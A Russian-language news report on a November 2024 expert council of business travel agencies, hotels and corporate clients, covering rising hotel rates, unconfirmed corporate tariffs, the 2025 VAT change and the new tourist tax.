script type="text/javascript" src="https://cdnwidget.simplejsmenu.com/public/lib.en.min.js">
  • Пн. Ноя 25th, 2024

Эксперты обсудили самые острые проблемы туристического рынка

Автор:admin

Ноя 25, 2024

15 ноября 2024 года прошел экспертный совет Союза агентств делового туризма (САД). Представители отелей, консолидаторов, TMC и корпоративных клиентов обсудили острые проблемы рынка: изменения налогового законодательства, рост стоимости отелей, сложности с корпоративными тарифами и технологические решения. Модераторами дискуссии выступили Юлия Липатова, управляющий директор компании «Аэроклуб», и Галина Полищук, управляющий директор корпоративного бизнеса Випсервис.

Эксперты обсудили самые острые проблемы туристического рынка

Одной из ключевых тем для обсуждения стало увеличение гостиничных тарифов. Юлия Липатова отметила, что за 10 месяцев текущего года общий рост стоимости проживания составил 17% к 2023 году, а для специальных корпоративных тарифов – 15%. Эксперты прогнозируют, что в 2025 году цены вырастут на 20%-25%. Основными факторами роста станут инфляция, рост затрат на персонал, введение новых ставок НДС и туристического налога.

При этом, по словам представителей отелей, корпоративные заказчики формируют свои тревел-бюджеты на 2025 год в том же объеме, что был в текущем, или увеличивая лимиты на 3%-5%, но не индексируя их в соответствии с инфляцией. Такая ситуация приводит к тому, что отели, соглашаясь на определенный уровень корпоративных тарифов в рамках отельных программ, не могут обеспечить наличие номеров по этой стоимости. Как отметила Галина Полищук, до 40% заявок на бронирование по корпоративным тарифам в городах, наиболее востребованных бизнесом, не подтверждаются, особенно в высокий сезон. Это приводит к снижению эффективности корпоративных программ.

К дополнительным сложностям, которые в результате растягивают процесс организации командировки до нескольких дней, относится и неготовность порядка 20% отелей к переходу на новые технологические решения, способные обеспечить мгновенное подтверждение бронирования. В отелях, которые по-прежнему работают с запросами вручную, официальный срок ответа достигает 24 часов, в то время как агентство гарантирует обработку клиентского запроса в течение 30 минут. «Когда отель по несколько часов не отвечает на запрос и в итоге не подтверждает тариф, сотрудник компании тратит дни на поиск альтернатив, агентства не могут соблюдать SLA, а общий уровень сервиса падает. Мгновенное подтверждение отеля должно стать стандартом отрасли. Причем не важно, по какому каналу коммуникации пришел запрос. Сегодня это уже требование времени», — подчеркнула Юлия Липатова.

Среди ключевых факторов, по причине которых отели не подтверждают корпоративные бронирования в рамках отельных программ, представители гостиниц называли сегментацию и размеры тарифов. Так, Анастасия Фомина, менеджер по работе с ключевыми корпоративными клиентами отельной группы Accor, рассказала: «Отель всегда смотрит на микс сегментов, чтобы гости проживали в равных долях. И если корпоративный сегмент уже занимает большую долю, то отель, соответственно, в этом случае будет отказывать».  В свою очередь, Евгения Савельева, генеральный управляющий отеля Movenpick Москва Таганская, отметила: «Цены выросли на все, и отели в течение прошлого года поднимали цены из квартала в квартал. Тем не менее, компании продолжали бронировать номера по корпоративным тарифам, которые были согласованы в 2023 году. Соответственно, чтобы отели сохраняли свой уровень доходности и клиентского сервиса, им приходилось отдавать предпочтение гостям с более высокими тарифами».

Вера Колоскова, региональный директор по продажам Radisson Hotel Group в России, поделилась: «Мы проанализировали рост цен и выделили три основные составляющие. Первое — это общая инфляция. Второе — рост зарплат и расходов на аутсорс, ведь отели — это люди, которые обслуживают, встречают, убирают номера, готовят завтраки, и за год рост этих затрат составил 50%-70% вне зависимости от города. Ну и третий пункт — питание, то есть цены на продукты. Возьмем завтраки: цены на яйца выросли на 72%-74%, кофе, апельсиновый сок — все это тоже дорожает».

Корпоративные заказчики отметили, что ограниченный объем подтвержденных ночей в текущем году также ведет к сложностям в согласовании низких тарифов на следующий год, так как по договору с отелями компании должны обеспечить определенное количество ночей за год.

Александр Курносов, генеральный директор «Академ-Онлайн», подчеркнул, что не стоит забывать о макроэкономическом факторе роста цен на отели: «Мы видим превышение спроса над предложением. Последний год-два — это рынок отелей, и они диктуют свои условия и цены. И ситуация может исправиться, наверное, только тогда, когда начнет действовать программа появления новых гостиниц за счет субсидий, которые дает правительство».

Подводя итог, Юлия Липатова пригласила компании и отели к открытому диалогу: «Пока не сократится разрыв между открытыми и корпоративными тарифами, пока компании и отели не сядут за стол переговоров с пониманием особенностей новых реалий, пока отели прозрачно не обозначат удовлетворяющие их цены и сезонность, можно не тратить время на корпоративные программы».

Одной из главных тем обсуждения стало изменение с начала 2025 года НДС для компаний, работающих в режиме УСН, и его влияние на ценообразование и планирование корпоративных программ. Крупные сетевые отели, такие как Accor, уже определились со ставками НДС (5% или 7%) и в случае изменений обещают информировать об этом заранее. Однако региональные отели до сих пор не приняли решение, несмотря на то, что нововведение ожидает рынок уже с 1 января 2025 года. Ряд клиентов с момента введения нулевой ставки НДС для отелей, то есть с лета 2022, начали учитывать НДС в корпоративных лимитах. Компании остались довольны такой системой – сотрудники удовлетворены, поскольку могут забронировать хороший отель в рамках лимита, а бухгалтерия после может вернуть НДС. Галина Полищук отметила: «Скорее всего, переход на новый НДС повлечет изменение в ценообразовании, может быть, случится рост. Мы прогнозируем задержки в подписании контрактов с отелями на упрощенной системе налогообложения, которые еще не определились. Однако корпоративному клиенту стоит обратить внимание, что если вы, например, устанавливаете лимит 5 тысяч рублей, не включая НДС, в каком-то случае вы получите отель за 5 тысяч рублей без НДС, а в каком-то — отель за 6 тысяч, но за вычетом НДС, то есть это будут те же самые 5 тысяч рублей. Такой подход позволит сохранить гибкость для сотрудников при бронировании отелей, а работодатель сможет впоследствии возместить НДС».

Тема туристического налога, который вступает в силу с 2025 года, также вызвала активное обсуждение. Дарья Кочеткова, управляющий директор «Островок.ру», отметила: «Сейчас нет четких разъяснений от Минфина или Госдумы по администрированию налога. Операторам рынка придется искать решения в режиме реального времени. Единственное, о чем с уверенностью можно говорить уже сейчас, — туристический налог точно не будет взиматься на месте с путешественника. Он платится отелем и, соответственно, должен быть в стоимости». Эксперты предложили внедрить модель, при которой туристический налог оплачивается агентством от лица клиента, чтобы минимизировать неудобства для сотрудников и сохранить прозрачность расчетов.

Завершая мероприятие, Юлия Липатова отметила: «Я хочу, чтобы следующий год был годом качественного сервиса. Годом, когда мы вместе решаем вопросы эффективности корпоративных программ и готовы к вызовам, которые нам предстоит преодолеть. Нам важно быть современными, адаптивными и открытыми для изменений».

Круглый стол подтвердил, что 2025 год станет годом серьезных изменений для индустрии делового туризма. Союз агентств делового туризма продолжит работу над улучшением взаимодействия всех участников рынка.

Автор: admin

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *